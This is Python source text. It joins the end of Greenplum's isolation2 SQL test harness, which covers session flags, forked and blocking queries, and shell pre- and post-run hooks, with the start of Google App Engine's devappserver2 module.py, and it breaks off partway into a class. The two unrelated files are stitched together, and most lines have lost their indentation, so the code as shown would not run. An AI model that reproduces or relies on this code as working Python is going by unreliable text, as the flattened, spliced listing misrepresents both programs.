cmd = ''' export RAW_STR%d='%s' && export RAW_STR=$RAW_STR%d && %s ; unset RAW_STR ''' % (
self.v_cnt, escape_in, self.v_cnt, sh_cmd)
        return self.exec_global_shell(cmd, strip_trailing_blank_lines)
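    # Illustrative call (hedged): exec_global_shell_with_orig_str(
    #     "abc", 'echo "${RAW_STR}" | tr a-z A-Z', True)
    # exports RAW_STR=abc, runs the pipeline in the bash daemon and returns
    # the captured output lines, e.g. ["ABC"].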
# extract shell, sql part from one line with format: @header '': SQL
# return row: (found the header or not?, the extracted shell, the SQL in the left part)
def extract_sh_cmd(self, header, input_str):
start = len(header)
is_start = False
end = 0
is_trip_comma = False
res_cmd = ""
res_sql = ""
input_str = input_str.lstrip()
if not input_str.startswith(header):
return (False, None, None)
for i in range(start, len(input_str)):
if end == 0 and input_str[i] == '\'':
if not is_start:
                    # find the shell begin position
is_start = True
start = i+1
continue
cnt = 0
for j in range(i-1, 0, -1):
if input_str[j] == '\\':
cnt = 1 + cnt
else:
break
if cnt % 2 == 1:
continue
                # find the shell end position
res_cmd = input_str[start: i]
end = i
continue
if end != 0:
# skip space until ':'
if input_str[i] == ' ':
continue
elif input_str[i] == ':':
is_trip_comma = True
res_sql = input_str[i+1:]
break
if not is_start or end == 0 or not is_trip_comma:
raise Exception("Invalid format: %s", input_str)
        # unescape \' to ' and \\ to \
res_cmd = res_cmd.replace('\\\'', '\'')
res_cmd = res_cmd.replace('\\\\', '\\')
return (True, res_cmd, res_sql)
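    # Example (hedged): extract_sh_cmd("@pre_run", "@pre_run 'echo hi': SELECT 1;")
    # returns (True, "echo hi", " SELECT 1;"); a line that does not start with
    # the header returns (False, None, None).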
class SQLIsolationExecutor(object):
def __init__(self, dbname=''):
self.processes = {}
# The re.S flag makes the "." in the regex match newlines.
# When matched against a command in process_command(), all
# lines in the command are matched and sent as SQL query.
self.command_pattern = re.compile(r"^(-?\d+|[*])([&\\<\\>URSMq]*?)\:(.*)", re.S)
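        # e.g. "2R&: SELECT 1;" matches with name "2", flags "R&" and
        # sql " SELECT 1;".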
if dbname:
self.dbname = dbname
else:
self.dbname = os.environ.get('PGDATABASE')
# To indicate the session has not been created or terminated.
class SessionError(Exception):
def __init__(self, name, mode, msg):
super(SQLIsolationExecutor.SessionError, self).__init__(msg)
self.name = name
self.mode = mode
class SQLConnection(object):
def __init__(self, out_file, name, mode, dbname, user = None, passwd = None):
self.name = name
self.mode = mode
self.out_file = out_file
self.dbname = dbname
self.user = user
self.passwd = passwd
parent_conn, child_conn = multiprocessing.Pipe(True)
self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
self.pipe = parent_conn
self.has_open = False
self.p.start()
# Close "our" copy of the child's handle, so that if the child dies,
# recv() on the pipe will fail.
child_conn.close()
self.out_file = out_file
def session_process(self, pipe):
sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
self.mode, pipe, self.dbname, user=self.user, passwd=self.passwd)
sp.do()
def query(self, command, post_run_cmd = None, global_sh_executor = None):
print(file=self.out_file)
self.out_file.flush()
if len(command.strip()) == 0:
return
if self.has_open:
raise Exception("Cannot query command while waiting for results")
self.pipe.send((command, False))
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
if re.match(r"^#.*:", r):
raise SQLIsolationExecutor.SessionError(self.name, self.mode, r)
            if post_run_cmd is not None:
new_out = global_sh_executor.exec_global_shell_with_orig_str(r.rstrip(), post_run_cmd, True)
for line in new_out:
print(line.rstrip(), file=self.out_file)
else:
print(r.rstrip(), file=self.out_file)
def fork(self, command, blocking, global_sh_executor):
print(" <waiting ...>", file=self.out_file)
self.pipe.send((command, True))
if blocking:
time.sleep(0.5)
if self.pipe.poll(0):
p = self.pipe.recv()
raise Exception("Forked command is not blocking; got output: %s" % p.strip())
self.has_open = True
def join(self):
r = None
print(" <... completed>", file=self.out_file)
if self.has_open:
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print(r.rstrip(), file=self.out_file)
self.has_open = False
def stop(self):
self.pipe.send(("", False))
self.p.join()
if self.has_open:
raise Exception("Should not finish test case while waiting for results")
def quit(self):
print(" ... <quitting>", file=self.out_file)
self.stop()
def terminate(self):
self.pipe.close()
self.p.terminate()
class SQLSessionProcess(object):
def __init__(self, name, mode, pipe, dbname, user = None, passwd = None):
"""
Constructor
"""
self.name = name
self.mode = mode
self.pipe = pipe
self.dbname = dbname
self.passwd = passwd
self.user = user
# If there is an exception thrown when creating session, save it and send
# it to pipe when we get the first execute_command call.
self.create_exception = None
if self.mode == "utility":
(hostname, port) = self.get_hostname_port(name, 'p')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_role=utility",
given_user=user,
given_passwd=passwd)
elif self.mode == "standby":
# Connect to standby even when its role is recorded
# as mirror. This is useful for scenarios where a
# test needs to promote a standby without using
# gpactivatestandby.
(hostname, port) = self.get_hostname_port(name, 'm')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_user=user,
given_passwd=passwd)
elif self.mode == "retrieve":
(hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_retrieve_conn=true",
given_user=user,
given_passwd=passwd)
elif self.mode == "mirror":
                # Connect to the mirror even when its role is recorded
# as mirror. This is useful for scenarios where a
# primary is marked down but could actually accept
# connection. This implies utility connection.
(hostname, port) = self.get_hostname_port(name, 'm')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_role=utility")
else:
self.con = self.connectdb(self.dbname)
def connectdb(self, given_dbname, given_host = None, given_port = None, given_opt = None, given_user = None, given_passwd = None):
con = None
retry = 1000
while retry:
try:
if (given_port is None):
con = pg.connect(host= given_host,
opt= given_opt,
dbname= given_dbname,
user = given_user,
passwd = given_passwd)
else:
con = pg.connect(host= given_host,
port= given_port,
opt= given_opt,
dbname= given_dbname,
user = given_user,
passwd = given_passwd)
break
except Exception as e:
if self.mode == "retrieve" and ("auth token is invalid" in str(e) or "Authentication failure" in str(e) or "does not exist" in str(e)):
self.create_exception = e
break
elif (("the database system is starting up" in str(e) or
"the database system is in recovery mode" in str(e)) and
retry > 1):
retry -= 1
time.sleep(0.1)
else:
raise
if con is not None:
con.set_notice_receiver(null_notice_receiver)
return con
def get_hostname_port(self, contentid, role):
"""
Gets the port number/hostname combination of the
contentid and role
"""
query = ("SELECT hostname, port FROM gp_segment_configuration WHERE"
" content = %s AND role = '%s'") % (contentid, role)
con = self.connectdb(self.dbname, given_opt="-c gp_role=utility")
r = con.query(query).getresult()
con.close()
if len(r) == 0:
raise Exception("Invalid content %s" % contentid)
if r[0][0] == socket.gethostname():
return (None, int(r[0][1]))
return (r[0][0], int(r[0][1]))
def printout_result(self, r):
"""
Print out a pygresql result set (a Query object, after the query
has been executed), in a format that imitates the default
formatting of psql. This isn't a perfect imitation: we left-justify
all the fields and headers, whereas psql centers the header, and
right-justifies numeric fields. But this is close enough, to make
gpdiff.pl recognize the result sets as such. (We used to just call
str(r), and let PyGreSQL do the formatting. But even though
PyGreSQL's default formatting is close to psql's, it's not close
enough.)
"""
widths = []
# Figure out the widths of each column.
fields = r.listfields()
for f in fields:
widths.append(len(str(f)))
rset = r.getresult()
for row in rset:
colno = 0
for col in row:
if col is None:
col = ""
widths[colno] = max(widths[colno], len(str(col)))
colno = colno + 1
# Start printing. Header first.
result = ""
colno = 0
for f in fields:
if colno > 0:
result += "|"
result += " " + f.ljust(widths[colno]) + " "
colno = colno + 1
result += "\n"
# Then the bar ("----+----")
colno = 0
for f in fields:
if colno > 0:
result += "+"
result += "".ljust(widths[colno] + 2, "-")
colno = colno + 1
result += "\n"
# Then the result set itself
for row in rset:
colno = 0
for col in row:
if colno > 0:
result += "|"
if isinstance(col, float):
col = format(col, "g")
elif isinstance(col, bool):
if col:
col = 't'
else:
col = 'f'
elif col is None:
col = ""
result += " " + str(col).ljust(widths[colno]) + " "
colno = colno + 1
result += "\n"
# Finally, the row count
if len(rset) == 1:
result += "(1 row)\n"
else:
result += "(" + str(len(rset)) + " rows)\n"
return result
def execute_command(self, command):
"""
Executes a given command
"""
try:
r = self.con.query(command)
if r is not None:
if type(r) == str:
# INSERT, UPDATE, etc that returns row count but not result set
echo_content = command[:-1].partition(" ")[0].upper()
return "%s %s" % (echo_content, r)
else:
# SELECT or similar, print the result set without the command (type pg.Query)
return self.printout_result(r)
else:
# CREATE or other DDL without a result set or count
echo_content = command[:-1].partition(" ")[0].upper()
return echo_content
except Exception as e:
return str(e)
def do(self):
"""
Process loop.
Ends when the command None is received
"""
(c, wait) = self.pipe.recv()
while c:
if wait:
time.sleep(0.1)
if self.create_exception:
# When parent process received this, it should know the connection has not been
# created. Thus, the process entry should be cleared.
self.pipe.send("#%s%s> %s" % (self.name, self.mode, str(self.create_exception)))
else:
r = self.execute_command(c)
self.pipe.send(r)
r = None
(c, wait) = self.pipe.recv()
def get_process(self, out_file, name, mode="", dbname="", user=None, passwd=None):
"""
Gets or creates the process by the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
        if len(name) > 0 and mode != "utility" and int(name) >= 1024:
            raise Exception("Session name should be smaller than 1024 unless it is a utility-mode content id")
        if (name, mode) not in self.processes:
if not dbname:
dbname = self.dbname
self.processes[(name, mode)] = SQLIsolationExecutor.SQLConnection(out_file, name, mode, dbname, user, passwd)
return self.processes[(name, mode)]
def quit_process(self, out_file, name, mode="", dbname=""):
"""
Quits a process with the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
        if len(name) > 0 and mode != "utility" and int(name) >= 1024:
            raise Exception("Session name should be smaller than 1024 unless it is a utility-mode content id")
        if (name, mode) not in self.processes:
raise Exception("Sessions not started cannot be quit")
self.processes[(name, mode)].quit()
del self.processes[(name, mode)]
def get_all_primary_contentids(self, dbname):
"""
Retrieves all primary content IDs (including the master). Intended for
use by *U queries.
"""
if not dbname:
dbname = self.dbname
con = pg.connect(dbname=dbname)
result = con.query("SELECT content FROM gp_segment_configuration WHERE role = 'p' order by content").getresult()
if len(result) == 0:
raise Exception("Invalid gp_segment_configuration contents")
return [int(content[0]) for content in result]
def __preprocess_sql(self, name, pre_run_cmd, sql, global_sh_executor):
if not pre_run_cmd:
return sql
(hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
# Inject the current hostname and port to the shell.
global_sh_executor.exec_global_shell("GP_HOSTNAME=%s" % hostname, True)
global_sh_executor.exec_global_shell("GP_PORT=%s" % port, True)
sqls = global_sh_executor.exec_global_shell_with_orig_str(sql, pre_run_cmd, True)
if (len(sqls) != 1):
raise Exception("Invalid shell command: %s" % "\n".join(sqls))
return sqls[0]
def __get_retrieve_user_token(self, name, global_sh_executor):
(hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
global_sh_executor.exec_global_shell("GP_HOSTNAME=%s" % hostname, True)
global_sh_executor.exec_global_shell("GP_PORT=%s" % port, True)
out = global_sh_executor.exec_global_shell("get_retrieve_token", True)
if (len(out) > 0):
token = out[0]
out = global_sh_executor.exec_global_shell("echo ${RETRIEVE_USER}", True)
if (len(out) > 0):
user = out[0]
return (user, token)
def process_command(self, command, output_file, global_sh_executor):
"""
Processes the given command.
The command at this point still includes the isolation behavior
flags, e.g. which session to use.
"""
process_name = ""
sql = command
flag = ""
con_mode = ""
dbname = ""
retrieve_token = None
retrieve_user = None
pre_run_cmd = None
post_run_cmd = None
m = self.command_pattern.match(command)
if m:
process_name = m.groups()[0]
flag = m.groups()[1]
if flag and flag[0] == "U":
con_mode = "utility"
elif flag and flag[0] == "S":
if len(flag) > 1:
flag = flag[1:]
con_mode = "standby"
elif flag and flag[0] == "R":
con_mode = "retrieve"
elif flag and flag[0] == "M":
con_mode = "mirror"
sql = m.groups()[2]
sql = sql.lstrip()
            # If db_name is specified, it should be of the following syntax:
# 1:@db_name <db_name>: <sql>
if sql.startswith('@db_name'):
sql_parts = sql.split(':', 2)
if not len(sql_parts) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not sql_parts[0].startswith('@db_name'):
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not len(sql_parts[0].split()) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
dbname = sql_parts[0].split()[1].strip()
if not dbname:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
sql = sql_parts[1]
else:
(found_hd, pre_run_cmd, ex_sql) = global_sh_executor.extract_sh_cmd('@pre_run', sql)
if found_hd:
sql = ex_sql
else:
(found_hd, post_run_cmd, ex_sql) = global_sh_executor.extract_sh_cmd('@post_run', sql)
if found_hd:
sql = ex_sql
if not flag:
if sql.startswith('!'):
sql = sql[1:]
# Check for execution mode. E.g.
# !\retcode path/to/executable --option1 --option2 ...
#
# At the moment, we only recognize the \retcode mode, which
# ignores all program output in the diff (it's still printed)
# and adds the return code.
mode = None
if sql.startswith('\\'):
mode, sql = sql.split(None, 1)
if mode != '\\retcode':
raise Exception('Invalid execution mode: {}'.format(mode))
cmd_output = subprocess.Popen(sql.strip(), stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
stdout, _ = cmd_output.communicate()
print(file=output_file)
if mode == '\\retcode':
print('-- start_ignore', file=output_file)
print(stdout.decode(), file=output_file)
if mode == '\\retcode':
print('-- end_ignore', file=output_file)
print('(exited with code {})'.format(cmd_output.returncode), file=output_file)
else:
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
elif flag == "&":
self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql.strip(), True, global_sh_executor)
elif flag == ">":
self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql.strip(), False, global_sh_executor)
elif flag == "<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, con_mode, dbname=dbname).join()
elif flag == "q":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, con_mode, dbname=dbname)
elif flag == "U":
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
sql_new = self.__preprocess_sql(name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
elif flag == "U&":
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql_new, True, global_sh_executor)
elif flag == "U<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, con_mode, dbname=dbname).join()
elif flag == "Uq":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, con_mode, dbname=dbname)
elif flag == "S":
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
elif flag == "R":
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
try:
sql_new = self.__preprocess_sql(name, pre_run_cmd, sql.strip(), global_sh_executor)
(retrieve_user, retrieve_token) = self.__get_retrieve_user_token(name, global_sh_executor)
self.get_process(output_file, name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).query(sql_new, post_run_cmd, global_sh_executor)
except SQLIsolationExecutor.SessionError as e:
print(str(e), file=output_file)
self.processes[(e.name, e.mode)].terminate()
del self.processes[(e.name, e.mode)]
elif flag == "R&":
sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
(retrieve_user, retrieve_token) = self.__get_retrieve_user_token(process_name, global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).fork(sql_new, True, global_sh_executor)
elif flag == "R<":
if len(sql) > 0:
raise Exception("No query should be given on join")
(retrieve_user, retrieve_token) = self.__get_retrieve_user_token(process_name, global_sh_executor)
self.get_process(output_file, process_name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).join()
elif flag == "Rq":
if len(sql) > 0:
raise Exception("No query should be given on quit")
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
try:
self.quit_process(output_file, name, con_mode, dbname=dbname)
except Exception as e:
print(str(e), file=output_file)
pass
elif flag == "M":
self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql.strip(), post_run_cmd, global_sh_executor)
else:
raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file, initfile_prefix):
"""
Processes the given sql file and writes the output
to output file
"""
shell_executor = GlobalShellExecutor(output_file, initfile_prefix)
try:
command = ""
newline = False
for line in sql_file:
# this logic replicates the python2 behavior of a trailing comma at the end of print
# i.e. ''' print >>output_file, line.strip(), '''
print((" " if command and not newline else "") + line.strip(), end="", file=output_file)
newline = False
if line[0] == "!":
command_part = line # shell commands can use -- for multichar options like --include
elif re.match(r";.*--", line) or re.match(r"^--", line):
command_part = line.partition("--")[0] # remove comment from line
else:
command_part = line
if command_part == "" or command_part == "\n":
print(file=output_file)
newline = True
elif re.match(r".*;\s*$", command_part) or re.match(r"^\d+[q\\<]:\s*$", line) or re.match(r"^\*Rq:$", line) or re.match(r"^-?\d+[SUR][q\\<]:\s*$", line):
command += command_part
try:
self.process_command(command, output_file, shell_executor)
except GlobalShellExecutor.ExecutionError as e:
# error in the daemon shell cannot be recovered
raise
except Exception as e:
print("FAILED: ", e, file=output_file)
command = ""
else:
command += command_part
for process in list(self.processes.values()):
process.stop()
except:
for process in list(self.processes.values()):
process.terminate()
shell_executor.terminate()
raise
finally:
for process in list(self.processes.values()):
process.terminate()
shell_executor.terminate()
class SQLIsolationTestCase:
"""
The isolation test case allows a fine grained control of interleaved
executing transactions. This is mainly used to test isolation behavior.
[<#>[flag]:] <sql> | ! <shell scripts or command>
#: either an integer indicating a unique session, or a content-id if
followed by U (for utility-mode connections) or R (for retrieve-mode
connection). In 'U' mode or 'R' mode, the
content-id can alternatively be an asterisk '*' to perform a
utility-mode/retrieve-mode query on the master and all primary segments.
If you want to create multiple connections to the same content-id, just
increase N in: "content-id + {gpdb segment node number} * N",
e.g. if gpdb cluster segment number is 3, then:
(1) the master utility connections can be: -1U, -4U, -7U;
(2) the seg0 connections can be: 0U, 3U, 6U;
(3) the seg1 connections can be: 1U, 4U, 7U;
(4) the seg2 connections can be: 2U, 5U, 8U;
flag:
&: expect blocking behavior
>: running in background without blocking
<: join an existing session
q: quit the given session without blocking
U: connect in utility mode to primary contentid from gp_segment_configuration
U&: expect blocking behavior in utility mode (does not currently support an asterisk target)
U<: join an existing utility mode session (does not currently support an asterisk target)
    R|R&|R<: similar in meaning to 'U', except that the connection is made in retrieve mode;
        retrieve-mode authentication is not exercised here, the normal authentication is used directly.
An example is:
Execute BEGIN in transaction 1
Execute BEGIN in transaction 2
Execute INSERT in transaction 2
Execute SELECT in transaction 1
Execute COMMIT in transaction 2
Execute SELECT in transaction 1
The isolation tests are specified identical to sql-scripts in normal
SQLTestCases. However, it is possible to prefix a SQL line with
    a transaction identifier followed by a colon (":").
The above example would be defined by
1: BEGIN;
2: BEGIN;
2: INSERT INTO a VALUES (1);
1: SELECT * FROM a;
2: COMMIT;
1: SELECT * FROM a;
Blocking behavior can be tested by forking and joining.
1: BEGIN;
2: BEGIN;
1: DELETE FROM foo WHERE a = 4;
2&: DELETE FROM foo WHERE a = 4;
1: COMMIT;
2<:
2: COMMIT;
2& forks the command. It is executed in the background. If the
command is NOT blocking at this point, it is considered an error.
2< joins the background command and outputs the result of the
command execution.
Session ids should be smaller than 1024.
2U: Executes a utility command connected to port 40000.
One difference to SQLTestCase is the output of INSERT.
SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
SQLIsolationTestCase would output "INSERT 1". As the
SQLIsolationTestCase needs to have a more fine-grained control
over the execution order than possible with PSQL, it uses
the pygresql python library instead.
Connecting to a specific database:
1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
2. If you want a specific session to be connected to a specific database , specify the sql as follows:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
etc
    Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of a session. For example, the following would error out:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: @db_name testdb: <sql>
2: <sql>
etc
Quitting sessions:
By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
    in the middle of the test execution, you can specify the flag 'q' with the session identifier. For example:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
1q:
2: <sql>
3: <sql>
2q:
3: <sql>
2: @db_name test: <sql>
1q: ---> Will quit the session established with testdb.
2q: ---> Will quit the session established with test2db.
The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
Note: Do not expect blocking behavior from explicit quit statements.
This implies that a subsequent statement can execute while the relevant
session is still undergoing exit.
Shell Execution for SQL or Output:
    @pre_run can be used for executing a shell command to change the input (i.e. each SQL statement) or get input info;
    @post_run can be used for executing a shell command to change the output (i.e. the result set printed for each SQL execution)
    or get output info. Just use the env variable ${RAW_STR} to refer to the input/output stream before shell execution,
    and the output of the shell command will be used as the SQL executed or the output printed into the results file.
1: @post_run ' TOKEN1=` echo "${RAW_STR}" | awk \'NR==3\' | awk \'{print $1}\'` && export MATCHSUBS="${MATCHSUBS}${NL}m/${TOKEN1}/${NL}s/${TOKEN1}/token_id1/${NL}" && echo "${RAW_STR}" ': SELECT token,hostname,status FROM GP_ENDPOINTS WHERE cursorname='c1';
2R: @pre_run ' echo "${RAW_STR}" | sed "s#@TOKEN1#${TOKEN1}#" ': RETRIEVE ALL FROM "@TOKEN1";
    These two samples do the following:
    - Sample 1: set env variable ${TOKEN1} to the cell (row 3, col 1) of the result set, and print the raw result.
        The env var ${MATCHSUBS} is used to store the matchsubs section so that we can store it into the initfile when
        this test case file has finished executing.
    - Sample 2: replacing "@TOKEN1" with the generated token fetched in Sample 1.
There are some helper functions which will be sourced automatically to make above
cases easier. See global_sh_executor.sh for more information.
    $RETRIEVE_USER is a special environment variable which will be read by python and used
    as the username for retrieve-mode sessions. `None` will be used if the value has not
    been set when a retrieve-mode session starts. See the get_retrieve_token in global_sh_executor.sh
for more information about how to get the retrieve session password.
Catalog Modification:
Some tests are easier to write if it's possible to modify a system
catalog across the *entire* cluster. To perform a utility-mode query on
all segments and the master, you can use *U commands:
*U: SET allow_system_table_mods = true;
*U: UPDATE pg_catalog.<table> SET <column> = <value> WHERE <cond>;
Since the number of query results returned by a *U command depends on
the developer's cluster configuration, it can be useful to wrap them in
a start_/end_ignore block. (Unfortunately, this also hides legitimate
failures; a better long-term solution is needed.)
Block/join flags are not currently supported with *U.
Line continuation:
If a line is not ended by a semicolon ';' which is followed by 0 or more spaces, the line will be combined with next line and
sent together as a single statement.
e.g.: Send to the server separately:
1: SELECT * FROM t1; -> send "SELECT * FROM t1;"
SELECT * FROM t2; -> send "SELECT * FROM t2;"
e.g.: Send to the server once:
1: SELECT * FROM
t1; SELECT * FROM t2; -> "send SELECT * FROM t1; SELECT * FROM t2;"
ATTENTION:
Send multi SQL statements once:
    Multiple SQL statements can be sent at once, but there are some known issues. Generally only the last query result will be printed.
    But due to the difficulty of dealing with semicolons inside quotes, we always echo the first SQL command instead of the last
    one if query() returns None. This creates some strange output like:
CREATE TABLE t1 (a INT); INSERT INTO t1 SELECT generate_series(1,1000);
CREATE 1000 (Should be INSERT 1000, but here the CREATE is taken due to the limitation)
"""
def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
"""
Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file , runs the sql
against the test case database (self.db_name) and verifies the output with the ans file.
If an 'init_file' exists in the same location as the sql_file, this will be used
while doing gpdiff.
"""
# Add gucs to the test sql and form the actual sql file to be run
if not out_dir:
out_dir = self.get_out_dir()
if not os.path.exists(out_dir):
TINCSystem.make_dirs(out_dir, ignore_exists_error = True)
if optimizer is None:
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
else:
# sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
self.test_artifacts.append(gucs_sql_file)
if not out_file:
if optimizer is None:
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
else:
# out file will be *_opt.out or *_planner.out based on optimizer
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))
self.test_artifacts.append(out_file)
executor = SQLIsolationExecutor(dbname=self.db_name)
with open(out_file, "w") as f:
executor.process_isolation_file(open(sql_file), f, out_file)
f.flush()
if out_file[-2:] == '.t':
out_file = out_file[:-2]
return out_file
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--dbname", dest="dbname",
help="connect to database DBNAME", metavar="DBNAME")
parser.add_option("--initfile_prefix", dest="initfile_prefix",
help="The file path prefix for automatically generated initfile", metavar="INITFILE_PREFIX")
(options, args) = parser.parse_args()
# Explicitly set multiprocessing start method to 'fork' (Unix
# default) to make isolation2 work with python3.8+ on MacOS.
if sys.version_info >= (3, 8) and sys.platform == "darwin":
multiprocessing.set_start_method('fork')
executor = SQLIsolationExecutor(dbname=options.dbname)
executor.process_isolation_file(sys.stdin, sys.stdout, options.initfile_prefix)
|
module.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os
import os.path
import random
import re
import string
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
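# Example (hedged, assuming the POSIX path separator): for one static_files
# handler with upload r'static/.*\.png' and one static_dir handler with
# static_dir 'images', this returns r'^(static/.*\.png)|(images/.*)$'.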
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
